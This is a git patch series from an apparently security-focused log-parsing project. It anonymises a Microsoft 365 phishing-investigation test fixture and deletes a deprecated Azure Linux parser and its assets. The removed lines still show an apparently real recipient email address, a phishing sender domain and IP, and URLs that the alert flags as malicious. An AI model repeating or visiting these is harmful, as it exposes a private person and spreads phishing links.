"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"<message.id.test@0123456789.userabc.mail.com>\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"user@mailbox.com\\\",\\\"Upn\\\":\\\"user@mailbox.com\\\",\\\"AadId\\\":\\\"0123ac45-6c7d-e89f-a0123b45c6d7\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:1a2b3456c7defabc8901d2e3fa456789\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0123a4567b8c9de0fa123bcde4f5a6b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:01a2bc345678de901f2a34b567cdef89\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"test.integration.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;test.integration.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}",
     "event": {
       "action": "AirInvestigationData",
       "code": "64",
@@ -23,24 +23,24 @@
       "attachments": [],
       "from": {
         "address": [
-          "support.33@wdezd.ersdz.meradebo.com"
+          "sender@test.integration.com"
         ]
       },
       "to": {
         "address": [
-          "ggravier@ixina.com"
+          "user@mailbox.com"
         ]
       }
     },
     "host": {
-      "name": "AM7EUR03BG406"
+      "name": "MACHINE01"
     },
     "log": {
       "level": "Informational"
     },
     "office365": {
       "audit": {
-        "object_id": "8217bd67-1368-4213-b6be-498cdbff1542"
+        "object_id": "1234ab56-7890-1234-c5de-678fabcd9012"
       },
       "investigation": {
         "alert": {
@@ -63,22 +63,39 @@
         "email": {
           "sender": {
             "domains": [
-              "wdezd.ersdz.meradebo.com"
+              "test.integration.com"
             ],
             "ip": [
-              "40.107.244.101"
+              "1.2.3.4"
             ]
           },
           "subjects": [
-            "\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b"
+            "Subject of the mail"
           ],
           "urls": [
-            "https://zpr.io/TUZAu6VrAvQT",
-            "https://zupimages.net/up/24/35/1itk.png"
+            "https://test.io/TUZAu6VrAvQT",
+            "https://website.net/up/24/35/image.png"
           ]
         },
-        "id": "urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8",
-        "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8",
+        "emails": [
+          {
+            "message_ids": "['01a2bcd3-efab-4c56-7890-12defa3bc4d', '0123a456-b789-0cd1-e23f-45abcd6ef78', 'ab12cde3-f456-789a-01bc-23defa4bc5d', '01a2b345-67c8-9012-345d-67efabc8d90e', '01a234b5-6789-012c-3d4e-56fabcd7ef8', 'a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6', '0a1b23c4-567d-8901-2345-67efabc8d90a', '0123a4b5-678c-9d0e-1f23-45abcde6fa78', '0a1b234c-5678-90d1-2efa-34bcdef5a6b7', '0123a4bc-5d6e-78f9-0123-45abcde67890']"
+          },
+          {
+            "delivery": {
+              "action": "DeliveredAsSpam",
+              "location": "JunkFolder",
+              "original_location": "Inbox"
+            },
+            "direction": "Inbound",
+            "language": "en",
+            "message_ids": [
+              "ab12cde3-f456-789a-01bc-23defa4bc5d"
+            ]
+          }
+        ],
+        "id": "urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9",
+        "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9",
         "status": "Pending Action",
         "threats": [
           "['ZapPhish', 'NormalPhish']"
@@ -92,7 +109,7 @@
       }
     },
     "organization": {
-      "id": "275ae857-f201-4a2e-8f43-d48391c56871"
+      "id": "123abc456-d789-0e1f-2a34-b56789c01234"
     },
     "related": {
       "user": [

From c741928dc4d979457ce55831b25235dd107c4737 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 17 Oct 2024 10:09:28 +0200
Subject: [PATCH 159/317] chore(Azure): remove the Azure linux format as it's
 deprecated

---
 Azure/azure-linux/CHANGELOG.md                |   8 -
 Azure/azure-linux/_meta/fields.yml            |   4 -
 Azure/azure-linux/_meta/logo.png              | Bin 35750 -> 0 bytes
 Azure/azure-linux/_meta/manifest.yml          |  13 -
 .../azure-linux/_meta/smart-descriptions.json |  24 --
 Azure/azure-linux/ingest/parser.yml           | 257 ------------------
 .../tests/auth_conversation_failed.json       |  28 --
 Azure/azure-linux/tests/auth_no_identity.json |  36 ---
 Azure/azure-linux/tests/cron_command1.json    |  35 ---
 Azure/azure-linux/tests/cron_command2.json    |  34 ---
 Azure/azure-linux/tests/disconnected.json     |  33 ---
 Azure/azure-linux/tests/omsagent_command.json |  39 ---
 .../azure-linux/tests/omsagent_command2.json  |  39 ---
 Azure/azure-linux/tests/session_closed.json   |  36 ---
 Azure/azure-linux/tests/session_opened.json   |  36 ---
 Azure/azure-linux/tests/systemd_session.json  |  36 ---
 16 files changed, 658 deletions(-)
 delete mode 100644 Azure/azure-linux/CHANGELOG.md
 delete mode 100644 Azure/azure-linux/_meta/fields.yml
 delete mode 100644 Azure/azure-linux/_meta/logo.png
 delete mode 100644 Azure/azure-linux/_meta/manifest.yml
 delete mode 100644 Azure/azure-linux/_meta/smart-descriptions.json
 delete mode 100644 Azure/azure-linux/ingest/parser.yml
 delete mode 100644 Azure/azure-linux/tests/auth_conversation_failed.json
 delete mode 100644 Azure/azure-linux/tests/auth_no_identity.json
 delete mode 100644 Azure/azure-linux/tests/cron_command1.json
 delete mode 100644 Azure/azure-linux/tests/cron_command2.json
 delete mode 100644 Azure/azure-linux/tests/disconnected.json
 delete mode 100644 Azure/azure-linux/tests/omsagent_command.json
 delete mode 100644 Azure/azure-linux/tests/omsagent_command2.json
 delete mode 100644 Azure/azure-linux/tests/session_closed.json
 delete mode 100644 Azure/azure-linux/tests/session_opened.json
 delete mode 100644 Azure/azure-linux/tests/systemd_session.json

diff --git a/Azure/azure-linux/CHANGELOG.md b/Azure/azure-linux/CHANGELOG.md
deleted file mode 100644
index 11bddf32c..000000000
--- a/Azure/azure-linux/CHANGELOG.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# Changelog
-
-All notable changes to this project will be documented in this file.
-
-The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
-and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
-
-## [Unreleased]
diff --git a/Azure/azure-linux/_meta/fields.yml b/Azure/azure-linux/_meta/fields.yml
deleted file mode 100644
index f00c8f7ec..000000000
--- a/Azure/azure-linux/_meta/fields.yml
+++ /dev/null
@@ -1,4 +0,0 @@
-azure_linux.message:
-  description: The linux message
-  name: azure_linux.message
-  type: keyword
diff --git a/Azure/azure-linux/_meta/logo.png b/Azure/azure-linux/_meta/logo.png
deleted file mode 100644
index d7e99ac573786fdf6a9acd3fcb1fa14a049f915f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 35750
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
